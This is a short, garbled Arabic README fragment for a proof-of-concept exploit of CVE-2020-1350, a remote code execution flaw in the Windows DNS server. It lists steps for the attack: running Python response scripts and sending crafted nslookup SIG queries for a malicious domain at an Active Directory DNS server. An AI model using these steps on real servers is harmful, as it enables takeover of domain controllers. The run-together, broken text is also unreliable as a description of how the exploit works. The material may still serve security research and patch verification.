
إثبات مفهوم لاستغلال CVE-2020-1350، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد في خادم DNS بنظام Windows. يوضح الاستغلال عبر استعلامات DNS مصممة خصيصًا.
CVE-2020-1350 إثبات المفهوم
33y0re.com)blah طوله 0x4 بايت و .net طوله 0x3 بايت)domain_correct على \x04blah\03net\x00python UDP_Response.py و python TCP_Response.pynslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP متبوعاً بـ: nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP